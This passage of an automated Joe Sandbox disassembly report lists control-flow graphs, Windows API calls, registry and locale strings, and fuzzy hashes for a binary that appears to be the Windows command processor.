7ff7823ef0a7-7ff7823ef0b2 442->448 449 7ff7823ef0d4-7ff7823ef0db 443->449 450 7ff7823ef0ea-7ff7823ef0f5 443->450 451 7ff7823ef141-7ff7823ef14b 444->451 452 7ff7823e543c-7ff7823e545e GetLocaleInfoW 444->452 453 7ff7823ef10b-7ff7823ef115 445->453 446->435 446->440 447->448 454 7ff7823ef09a-7ff7823ef0a5 447->454 448->439 449->450 455 7ff7823ef0dd-7ff7823ef0e8 449->455 450->445 460 7ff7823ef14e-7ff7823ef158 451->460 456 7ff7823e5464-7ff7823e5486 GetLocaleInfoW 452->456 457 7ff7823ef184-7ff7823ef18b 452->457 458 7ff7823ef12d-7ff7823ef138 453->458 459 7ff7823ef117-7ff7823ef11e 453->459 454->442 454->448 455->443 455->450 462 7ff7823ef1c4-7ff7823ef1ce 456->462 463 7ff7823e548c-7ff7823e54ae GetLocaleInfoW 456->463 461 7ff7823ef18e-7ff7823ef198 457->461 458->451 459->458 464 7ff7823ef120-7ff7823ef12b 459->464 465 7ff7823ef170-7ff7823ef17b 460->465 466 7ff7823ef15a-7ff7823ef161 460->466 468 7ff7823ef1b0-7ff7823ef1bb 461->468 469 7ff7823ef19a-7ff7823ef1a1 461->469 472 7ff7823ef1d1-7ff7823ef1db 462->472 470 7ff7823e54b4-7ff7823e54f5 setlocale call 7ff7823e8f80 463->470 471 7ff7823ef207-7ff7823ef20e 463->471 464->453 464->458 465->457 466->465 467 7ff7823ef163-7ff7823ef16e 466->467 467->460 467->465 468->462 469->468 474 7ff7823ef1a3-7ff7823ef1ae 469->474 473 7ff7823ef211-7ff7823ef21b 471->473 476 7ff7823ef1f3-7ff7823ef1fe 472->476 477 7ff7823ef1dd-7ff7823ef1e4 472->477 478 7ff7823ef233-7ff7823ef23e 473->478 479 7ff7823ef21d-7ff7823ef224 473->479 474->461 474->468 476->471 477->476 481 7ff7823ef1e6-7ff7823ef1f1 477->481 479->478 482 7ff7823ef226-7ff7823ef231 479->482 481->472 481->476 482->473 482->478
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                  • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                  • API String ID: 1351325837-2236139042
                                                                                                  • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                  • Instruction ID: 1b4550147cb6ddf8cda9f0308d50090654fb4eeac9d8d6c3e1876942f8997a16
                                                                                                  • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                  • Instruction Fuzzy Hash: 91F18069B0474295EF51AF11D5202B9B6A4FF08B82FE44179CA0D53B94EFBCE94AC330

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 483 7ff7823e4224-7ff7823e42a5 InitializeProcThreadAttributeList 484 7ff7823eecd4-7ff7823eecee GetLastError call 7ff7823f9eec 483->484 485 7ff7823e42ab-7ff7823e42e5 UpdateProcThreadAttribute 483->485 493 7ff7823eed1e 484->493 486 7ff7823eecf0-7ff7823eed19 GetLastError call 7ff7823f9eec DeleteProcThreadAttributeList 485->486 487 7ff7823e42eb-7ff7823e43c6 memset * 2 GetStartupInfoW call 7ff7823e3a90 call 7ff7823db900 485->487 486->493 497 7ff7823e43cc-7ff7823e43d3 487->497 498 7ff7823e4638-7ff7823e4644 _local_unwind 487->498 499 7ff7823e4649-7ff7823e4650 497->499 500 7ff7823e43d9-7ff7823e43dc 497->500 498->499 499->500 503 7ff7823e4656-7ff7823e465d 499->503 501 7ff7823e4415-7ff7823e4424 call 7ff7823e5a68 500->501 502 7ff7823e43de-7ff7823e43f5 wcsrchr 500->502 510 7ff7823e442a-7ff7823e4486 CreateProcessW 501->510 511 7ff7823e4589-7ff7823e4590 501->511 502->501 504 7ff7823e43f7-7ff7823e440f lstrcmpW 502->504 503->501 506 7ff7823e4663 503->506 504->501 507 7ff7823e4668-7ff7823e466d call 7ff7823f9044 504->507 506->500 507->501 514 7ff7823e448b-7ff7823e448f 510->514 511->510 512 7ff7823e4596-7ff7823e45fa CreateProcessAsUserW 511->512 512->514 515 7ff7823e4495-7ff7823e44c7 CloseHandle call 7ff7823e498c 514->515 516 7ff7823e4672-7ff7823e4682 GetLastError 514->516 519 7ff7823e468d-7ff7823e4694 515->519 520 7ff7823e44cd-7ff7823e44e5 515->520 516->519 521 7ff7823e4696-7ff7823e46a0 519->521 522 7ff7823e46a2-7ff7823e46ac 519->522 523 7ff7823e47a3-7ff7823e47a9 520->523 524 7ff7823e44eb-7ff7823e44f2 520->524 521->522 525 7ff7823e46ae-7ff7823e46b5 call 7ff7823e97bc 521->525 522->525 526 7ff7823e4705-7ff7823e4707 522->526 527 7ff7823e45ff-7ff7823e4607 524->527 528 7ff7823e44f8-7ff7823e4507 524->528 540 7ff7823e4703 525->540 541 7ff7823e46b7-7ff7823e4701 call 7ff78242c038 525->541 526->520 530 7ff7823e470d-7ff7823e472a call 7ff7823dcd90 526->530 527->528 531 7ff7823e460d 527->531 532 7ff7823e4612-7ff7823e4616 528->532 533 7ff7823e450d-7ff7823e4553 call 7ff7823e5cb4 call 7ff7823e33f0 call 7ff7823e498c 528->533 548 7ff7823e472c-7ff7823e4738 _local_unwind 530->548 549 7ff7823e473d-7ff7823e4767 call 7ff7823e13e0 call 7ff7823f9eec call 7ff7823dff70 _local_unwind 530->549 536 7ff7823e476c-7ff7823e4773 531->536 538 7ff7823e461c-7ff7823e4633 532->538 539 7ff7823e47d7-7ff7823e47df 532->539 565 7ff7823e4558-7ff7823e455e 533->565 536->528 546 7ff7823e4779-7ff7823e4780 536->546 543 7ff7823e47f2-7ff7823e483c call 7ff7823dff70 DeleteProcThreadAttributeList call 7ff7823e8f80 538->543 539->543 544 7ff7823e47e1-7ff7823e47ed CloseHandle 539->544 540->526 541->526 544->543 546->528 553 7ff7823e4786-7ff7823e4789 546->553 548->549 549->536 553->528 558 7ff7823e478f-7ff7823e4792 553->558 558->523 562 7ff7823e4794-7ff7823e479d call 7ff7823fa250 558->562 562->523 562->528 568 7ff7823e4564-7ff7823e4579 call 7ff7823e498c 565->568 569 7ff7823e47ae-7ff7823e47ca call 7ff7823e33f0 565->569 568->543 576 7ff7823e457f-7ff7823e4584 call 7ff7823fa920 568->576 569->539 576->543
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                  • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                  • API String ID: 388421343-2905461000
                                                                                                  • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                  • Instruction ID: 45153a5da332e9f13f90a9b4cc20274975fdf5eafc6591f100395bdc5d5849e0
                                                                                                  • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                  • Instruction Fuzzy Hash: E9F14235A18B8295E760AB11E4507BAF7A4FF89742FA04179DA4D43F54DFBCE448CB20

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 579 7ff7823e5554-7ff7823e55b9 call 7ff7823ea640 582 7ff7823e55bc-7ff7823e55e8 RegOpenKeyExW 579->582 583 7ff7823e55ee-7ff7823e5631 RegQueryValueExW 582->583 584 7ff7823e5887-7ff7823e588e 582->584 585 7ff7823e5637-7ff7823e5675 RegQueryValueExW 583->585 586 7ff7823ef248-7ff7823ef24d 583->586 584->582 587 7ff7823e5894-7ff7823e58db time srand call 7ff7823e8f80 584->587 588 7ff7823e568e-7ff7823e56cc RegQueryValueExW 585->588 589 7ff7823e5677-7ff7823e567c 585->589 591 7ff7823ef24f-7ff7823ef25b 586->591 592 7ff7823ef260-7ff7823ef265 586->592 595 7ff7823ef2b6-7ff7823ef2bb 588->595 596 7ff7823e56d2-7ff7823e5710 RegQueryValueExW 588->596 593 7ff7823e5682-7ff7823e5687 589->593 594 7ff7823ef28b-7ff7823ef290 589->594 591->585 592->585 598 7ff7823ef26b-7ff7823ef286 _wtol 592->598 593->588 594->588 601 7ff7823ef296-7ff7823ef2b1 _wtol 594->601 602 7ff7823ef2bd-7ff7823ef2c9 595->602 603 7ff7823ef2ce-7ff7823ef2d3 595->603 599 7ff7823e5712-7ff7823e5717 596->599 600 7ff7823e5729-7ff7823e5767 RegQueryValueExW 596->600 598->585 605 7ff7823e571d-7ff7823e5722 599->605 606 7ff7823ef2f9-7ff7823ef2fe 599->606 607 7ff7823e579f-7ff7823e57dd RegQueryValueExW 600->607 608 7ff7823e5769-7ff7823e576e 600->608 601->588 602->596 603->596 604 7ff7823ef2d9-7ff7823ef2f4 _wtol 603->604 604->596 605->600 606->600 609 7ff7823ef304-7ff7823ef31a wcstol 606->609 612 7ff7823e57e3-7ff7823e57e8 607->612 613 7ff7823ef3a9 607->613 610 7ff7823e5774-7ff7823e578f 608->610 611 7ff7823ef320-7ff7823ef325 608->611 609->611 616 7ff7823e5795-7ff7823e5799 610->616 617 7ff7823ef357-7ff7823ef35e 610->617 614 7ff7823ef34b 611->614 615 7ff7823ef327-7ff7823ef33f wcstol 611->615 618 7ff7823ef363-7ff7823ef368 612->618 619 7ff7823e57ee-7ff7823e5809 612->619 620 7ff7823ef3b5-7ff7823ef3b8 613->620 614->617 615->614 616->607 616->617 617->607 621 7ff7823ef38e 618->621 622 7ff7823ef36a-7ff7823ef382 wcstol 618->622 623 7ff7823e580f-7ff7823e5813 619->623 624 7ff7823ef39a-7ff7823ef39d 619->624 625 7ff7823e582c 620->625 626 7ff7823ef3be-7ff7823ef3c5 620->626 621->624 622->621 623->624 627 7ff7823e5819-7ff7823e5823 623->627 624->613 629 7ff7823e5832-7ff7823e5870 RegQueryValueExW 625->629 630 7ff7823ef3ca-7ff7823ef3d1 625->630 626->629 627->620 628 7ff7823e5829 627->628 628->625 631 7ff7823e5876-7ff7823e5882 RegCloseKey 629->631 632 7ff7823ef3dd-7ff7823ef3e2 629->632 630->632 631->584 633 7ff7823ef433-7ff7823ef439 632->633 634 7ff7823ef3e4-7ff7823ef412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff7823ef43f-7ff7823ef44c call 7ff7823db900 633->635 636 7ff7823ef414-7ff7823ef426 call 7ff7823e13e0 634->636 637 7ff7823ef428 634->637 635->631 640 7ff7823ef42e 636->640 637->640 640->633
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryValue$CloseOpensrandtime
                                                                                                  • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                  • API String ID: 145004033-3846321370
                                                                                                  • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                  • Instruction ID: cfb1b55e255c250bba52f146bca12e34ef3502b926dfafb88d1960a82abc946b
                                                                                                  • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                  • Instruction Fuzzy Hash: 00E1947651DA82D6E790AB10E45057AF7A0FB88742FE05135EA8E43E54DFFCD948CB20

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 643 7ff7823e4d5c-7ff7823e4e4b InitializeCriticalSection call 7ff7823e58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7823e0580 call 7ff7823e4a14 call 7ff7823e4ad0 call 7ff7823e5554 GetCommandLineW 654 7ff7823e4e4d-7ff7823e4e54 643->654 654->654 655 7ff7823e4e56-7ff7823e4e61 654->655 656 7ff7823e51cf-7ff7823e51e3 call 7ff7823d3278 call 7ff7823e4c1c 655->656 657 7ff7823e4e67-7ff7823e4e7b call 7ff7823e2e44 655->657 662 7ff7823e4e81-7ff7823e4ec3 GetCommandLineW call 7ff7823e13e0 call 7ff7823dca40 657->662 663 7ff7823e51ba-7ff7823e51ce call 7ff7823d3278 call 7ff7823e4c1c 657->663 662->663 674 7ff7823e4ec9-7ff7823e4ee8 call 7ff7823e417c call 7ff7823e2394 662->674 663->656 678 7ff7823e4eed-7ff7823e4ef5 674->678 678->678 679 7ff7823e4ef7-7ff7823e4f1f call 7ff7823daa54 678->679 682 7ff7823e4f95-7ff7823e4fee GetConsoleOutputCP GetCPInfo call 7ff7823e51ec GetProcessHeap HeapAlloc 679->682 683 7ff7823e4f21-7ff7823e4f30 679->683 689 7ff7823e4ff0-7ff7823e5006 GetConsoleTitleW 682->689 690 7ff7823e5012-7ff7823e5018 682->690 683->682 684 7ff7823e4f32-7ff7823e4f39 683->684 684->682 686 7ff7823e4f3b-7ff7823e4f77 call 7ff7823d3278 GetWindowsDirectoryW 684->686 696 7ff7823e51b1-7ff7823e51b9 call 7ff7823e4c1c 686->696 697 7ff7823e4f7d-7ff7823e4f90 call 7ff7823e3c24 686->697 689->690 694 7ff7823e5008-7ff7823e500f 689->694 691 7ff7823e507a-7ff7823e507e 690->691 692 7ff7823e501a-7ff7823e5024 call 7ff7823e3578 690->692 698 7ff7823e5080-7ff7823e50b3 call 7ff7823fb89c call 7ff7823d586c call 7ff7823d3240 call 7ff7823e3448 691->698 699 7ff7823e50eb-7ff7823e5161 GetModuleHandleW GetProcAddress * 3 691->699 692->691 706 7ff7823e5026-7ff7823e5030 692->706 694->690 696->663 697->682 724 7ff7823e50b5-7ff7823e50d0 call 7ff7823e3448 * 2 698->724 725 7ff7823e50d2-7ff7823e50d7 call 7ff7823d3278 698->725 704 7ff7823e5163-7ff7823e5167 699->704 705 7ff7823e516f 699->705 704->705 709 7ff7823e5169-7ff7823e516d 704->709 710 7ff7823e5172-7ff7823e51af free call 7ff7823e8f80 705->710 712 7ff7823e5075 call 7ff7823fcff0 706->712 713 7ff7823e5032-7ff7823e5059 GetStdHandle GetConsoleScreenBufferInfo 706->713 709->705 709->710 712->691 716 7ff7823e505b-7ff7823e5067 713->716 717 7ff7823e5069-7ff7823e5073 713->717 716->691 717->691 717->712 729 7ff7823e50dc-7ff7823e50e6 GlobalFree 724->729 725->729 729->699
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4D9A
                                                                                                    • Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF
                                                                                                  • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DBB
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E4DCA
                                                                                                  • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DE0
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E4DEE
                                                                                                  • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E04
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0589
                                                                                                    • Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05AF
                                                                                                    • Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05EF
                                                                                                    • Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0632
                                                                                                    • Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E0647
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
                                                                                                    • Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
                                                                                                    • Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
                                                                                                    • Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2
                                                                                                    • Part of subcall function 00007FF7823E4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
                                                                                                    • Part of subcall function 00007FF7823E4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF
                                                                                                    • Part of subcall function 00007FF7823E5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702
                                                                                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E35
                                                                                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E81
                                                                                                  • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F69
                                                                                                  • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F95
                                                                                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FB0
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FC1
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FD8
                                                                                                  • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FF8
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5037
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E504B
                                                                                                  • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50DF
                                                                                                  • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50F2
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E510F
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5130
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E514A
                                                                                                  • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5175
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                  • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                  • API String ID: 1049357271-3021193919
                                                                                                  • Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
                                                                                                  • Instruction ID: e2b4de068f5b9bd485b54334b7b7e689d55a2f88eac40b734f7ceb225c21face
                                                                                                  • Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
                                                                                                  • Instruction Fuzzy Hash: ACC17A65A08B4296EA44BB11E814179FBA0FF89B53FE44178D90E07B55DFBCE849C330

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 821 7ff7823e37d8-7ff7823e3887 GetCurrentThreadId OpenThread call 7ff7823e04f4 HeapSetInformation RegOpenKeyExW 824 7ff7823e388d-7ff7823e38eb call 7ff7823e5920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff7823ee9f8-7ff7823eea3b RegQueryValueExW RegCloseKey 821->825 828 7ff7823eea41-7ff7823eea59 GetThreadLocale 824->828 829 7ff7823e38f1-7ff7823e3913 memset 824->829 825->828 830 7ff7823eea74-7ff7823eea77 828->830 831 7ff7823eea5b-7ff7823eea67 828->831 832 7ff7823eeaa5 829->832 833 7ff7823e3919-7ff7823e3935 call 7ff7823e4d5c 829->833 834 7ff7823eea94-7ff7823eea96 830->834 835 7ff7823eea79-7ff7823eea7d 830->835 831->830 838 7ff7823eeaa8-7ff7823eeab4 832->838 842 7ff7823eeae2-7ff7823eeaff call 7ff7823d3240 call 7ff7823f8530 call 7ff7823e4c1c 833->842 843 7ff7823e393b-7ff7823e3942 833->843 834->832 835->834 837 7ff7823eea7f-7ff7823eea89 835->837 837->834 838->833 840 7ff7823eeaba-7ff7823eeac3 838->840 841 7ff7823eeacb-7ff7823eeace 840->841 844 7ff7823eeac5-7ff7823eeac9 841->844 845 7ff7823eead0-7ff7823eeadb 841->845 853 7ff7823eeb00-7ff7823eeb0d 842->853 847 7ff7823e3948-7ff7823e3962 _setjmp 843->847 848 7ff7823eeb27-7ff7823eeb40 _setjmp 843->848 844->841 845->838 851 7ff7823eeadd 845->851 847->853 854 7ff7823e3968-7ff7823e396d 847->854 849 7ff7823eeb46-7ff7823eeb49 848->849 850 7ff7823e39fe-7ff7823e3a05 call 7ff7823e4c1c 848->850 856 7ff7823eeb66-7ff7823eeb6f call 